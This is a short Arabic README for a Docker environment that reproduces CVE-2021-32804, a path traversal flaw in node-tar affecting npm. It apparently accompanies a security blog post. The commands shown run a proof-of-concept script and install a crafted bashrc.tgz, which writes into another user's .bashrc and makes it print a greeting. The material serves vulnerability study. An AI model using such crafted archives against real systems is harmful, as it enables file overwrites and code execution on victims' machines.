
بيئة إعادة إنتاج قائمة على Docker لـ CVE-2021-32804، وهي ثغرة من نوع اجتياز المسار في node-tar تؤثر على npm، مع نصوص استغلال خطوة بخطوة.
هذا هو المستودع المستخدم لبناء بيئة Docker المستخدمة في مدونة yamory «CVE-2021-32804 ثغرة تجاوز المسار في node-tar التي تؤثر أيضًا على npm».
docker build -t cve-2021-32804 .
docker run -it cve-2021-32804 /bin/bash
root@5e1af2148215:/poc# node tar.js
root@5e1af2148215:/poc# su node
Hello, world!
root@5e1af2148215:/poc# npm i bashrc.tgz
root@5e1af2148215:/poc# su node
Hello, world!